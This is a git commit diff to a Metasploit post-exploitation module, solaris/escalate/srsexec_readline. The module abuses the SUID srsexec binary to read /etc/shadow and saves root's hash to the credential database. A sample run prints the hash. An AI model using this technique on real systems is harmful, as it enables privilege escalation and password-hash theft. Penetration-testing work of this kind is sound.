print when not verbose

GSoC/Meterpreter_Web_Console
h00die 2018-09-20 20:54:41 -04:00
parent ff5de7b81d
commit ee0776b095
2 changed files with 15 additions and 11 deletions

View File

@ -42,15 +42,16 @@
msf5 post(solaris/escalate/srsexec_readline) > run
[+] 3.2.4 is vulnerable
[+] Output: verify_binary(wsltw)
srsexec: binary_name: wsltw
srsexec: name_buf: wsltw_______________
[+] Raw Command Output: verify_binary(vFYZf)
srsexec: binary_name: vFYZf
srsexec: name_buf: vFYZf_______________
binaries file line: root:MW7h.vpI1Kq1g:1
binaries file line: :17599::::::
smmsp:NP
Security verification failed for binary: wsltw
Security verification failed for binary: vFYZf
see SYSLOG(/var/adm/messages) for errors
[+] Adding root's hash added to credential database.
[+] First line of /etc/shadow: root:MW7h.vpI1Kq1g:17599::::::
[+] Adding root's hash to the credential database.
[*] Post module execution completed
msf5 post(solaris/escalate/srsexec_readline) > creds
Credentials

View File

@ -76,8 +76,7 @@ class MetasploitModule < Msf::Post
flag = Rex::Text.rand_text_alpha 5
output = cmd_exec("#{suid_bin_path} -dvb #{datastore['FILE']} #{flag}")
vprint_good("Output: #{output}")
return unless datastore['FILE'] == '/etc/shadow'
vprint_good("Raw Command Output: #{output}")
# The first line of the file is cut at 20 characters.
# If the output is longer than 20 characters, then
@ -85,10 +84,14 @@ class MetasploitModule < Msf::Post
# followed by the next 18 characters.
formatted_output = output.scan(/binaries file line: (.+)$/).flatten.map { |line|
(line.length == 20) ? line[0..18] : line
(line.length == 20) ? line[0..17] : line
}.join
return if formatted_output.empty?
print_good("First line of #{datastore['FILE']}: #{formatted_output}")
return unless datastore['FILE'] == '/etc/shadow'
print_good("Adding root's hash to the credential database.")
credential_data = {
origin_type: :session,